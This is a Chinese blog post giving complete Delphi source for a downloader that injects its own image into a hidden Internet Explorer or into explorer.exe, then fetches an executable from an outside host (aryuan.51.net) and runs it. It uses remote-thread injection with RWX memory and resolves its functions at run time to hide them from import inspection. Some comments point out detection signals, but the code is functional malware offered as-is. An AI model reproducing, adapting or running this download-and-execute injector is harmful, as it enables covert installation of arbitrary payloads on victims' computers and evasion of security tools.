无DLL版Downloader的代码

该博客展示了一段代码,通过动态加载shell32.dll和Urlmon.dll中的函数,实现文件下载和程序执行。同时,代码还具备向explorer.exe或iexplore.exe进程注入的功能,包括内存分配、数据写入和远程线程创建等操作。


program InjectTheSelf;

{$IMAGEBASE $13140000}

uses Windows;

{$L 'SRT.obj'}

var
  // shell32!ShellExecuteA, resolved by name at run time in Download via
  // GetProcAddress instead of importing the ShellAPI unit (author's note: it
  // also keeps the binary a bit smaller).
  ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
  // urlmon!URLDownloadToFileA, also resolved by name at run time. The author
  // points out that this keeps the function name out of the static import
  // table (IAT); static import inspection alone therefore misses it, while
  // tracing LoadLibrary/GetProcAddress at run time still exposes it.
  Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
  // Module handles returned by the LoadLibrary calls in Download.
  hShell,hUrlmon: THandle;

// Returns the path of IEXPLORE.EXE read from the App Paths registry key, or a
// hard-coded default path when the value cannot be queried.
function GetIEAppPath:string;
var
  iekey: Hkey;
  iename: array [0..255] of char;   // 256-byte buffer for the registry value
  vType,dLength :DWORD;
begin
  vType := REG_SZ;
  // Opens the key with KEY_ALL_ACCESS. The return value is not checked, so
  // iekey is used below even if the open failed. The separators appear as '/'
  // on this page; registry key paths normally use '\' -- possibly a rendering
  // artefact of the blog.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
  dLength := SizeOf(iename);
  // Queries the key's default (unnamed) value; 0 means ERROR_SUCCESS.
  if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
    Result := iename
  else
    // Fallback used when the query fails (including when the open above failed).
    Result := 'C:/Program Files/Internet Explorer/IEXPLORE.EXE';
  RegCloseKey(iekey);
end;

// Download routine. This is the procedure that Inject/RunInject start as a
// remote thread inside the target process: it fetches a remote executable,
// launches it, and then terminates the process it is running in.
procedure Download;  //download routine
begin
  // kernel32/user32 are loaded first (handles discarded), then the two
  // imports are resolved by name. No result is checked: if a LoadLibrary or
  // GetProcAddress call fails, the nil function pointer is still called.
  LoadLibrary('kernel32.dll');
  LoadLibrary('user32.dll');
  hShell:=LoadLibrary('Shell32.dll');
  hUrlmon:=LoadLibrary('urlmon.dll');
  @ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
  @Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
  // Downloads the URL to the drop path and runs it with ShellExecuteA
  // ('open', ShowCmd 5 = SW_SHOW). The URL and the C:/test.exe drop path are
  // the network and file-system indicators for this sample; the download
  // happens over plain HTTP from inside the injected host process.
  Downfile(nil,'http://aryuan.51.net/test.exe','C:/test.exe', 0, nil);
  ShellRun(0,'open','C:/test.exe',nil,nil,5);
  // ExitProcess here kills the *host* process (explorer.exe or the hidden
  // iexplore.exe), not the original injector.
  ExitProcess(0);
end;

// Copies this process's own PE image into the address space of ProcessHandle
// at the same base address and starts EntryPoint there as a remote thread.
// The VirtualAllocEx (RWX) + WriteProcessMemory + CreateRemoteThread sequence
// on a handle to another process is the pattern that ETW/EDR-based injection
// detections typically key on.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
  Module, NewModule: Pointer;
  Size, BytesWritten, TID: longword;
begin
  // Base address of this process's own executable image (module handle of
  // the EXE, which points at the DOS header).
  Module := Pointer(GetModuleHandle(nil));
  // Walks the PE headers: DOS header e_lfanew -> 4-byte PE signature ->
  // IMAGE_FILE_HEADER -> IMAGE_OPTIONAL_HEADER, and reads SizeOfImage, the
  // size of the mapped image.
  Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
          SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
  // Attempts to release whatever the target has mapped at this address;
  // the return value is ignored.
  VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  // Reserves and commits Size bytes in the target at the same address as
  // Module, with PAGE_EXECUTE_READWRITE. Requesting the identical base means
  // no relocation is needed; the $IMAGEBASE directive at the top of the file
  // presumably picks a base the author expects to be free in the target
  // (inference, not verified here). RWX private memory in a process is
  // itself a common hunting signal.
  NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  // Copies the entire image from this process into the target. Neither the
  // return value nor BytesWritten is checked, and NewModule is not compared
  // with Module.
  WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
  // Starts EntryPoint in the target with Module as the thread parameter; TID
  // receives the new thread id. EntryPoint is an address taken from this
  // process, so the code relies on the copy having landed at exactly Module.
  CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

// Picks a target process by window class, opens it with PROCESS_ALL_ACCESS
// and injects Download into it. InjType = 0 targets explorer.exe (owner of
// the taskbar window 'Shell_TrayWnd'); any other value starts a hidden
// Internet Explorer instance and targets it ('IEFrame').
procedure RunInject(InjType:integer);
var
  ProcessHandle, PID: longword;
  StartupInfo: TStartupInfo;        // only used by the commented-out CreateProcess call
  ProcessInfo: TProcessInformation; // likewise
begin
  if InjType=0 then //inject into explorer.exe
  begin
    // PID of the process owning the taskbar window; 'Shell_TrayWnd' is its
    // window class (the author notes it was looked up with Spy++). The
    // FindWindow result is not checked before use.
    GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  end
  else  //inject into iexplore.exe
  begin
    // Alternative launch the author left disabled:
    //CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
    // Starts IE hidden (SW_HIDE) via WinExec, waits 500 ms for its window,
    // then reads the PID from the 'IEFrame' window. A hidden iexplore.exe
    // spawned by an unrelated parent process is itself an anomaly worth
    // alerting on in process-creation telemetry.
    winexec(PChar(GetIEAppPath),sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
  end;
  // Opens the target with full access; a PROCESS_ALL_ACCESS handle request
  // against another process is a high-signal event for handle auditing.
  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
  Inject(ProcessHandle, @Download);
  // Close the handle
  CloseHandle(ProcessHandle);
end;

// Program entry: injects into a freshly started hidden iexplore.exe (1);
// passing 0 would target explorer.exe instead.
begin
  RunInject(1);  //1 inject into iexplore.exe, 0 inject into explorer.exe
end.
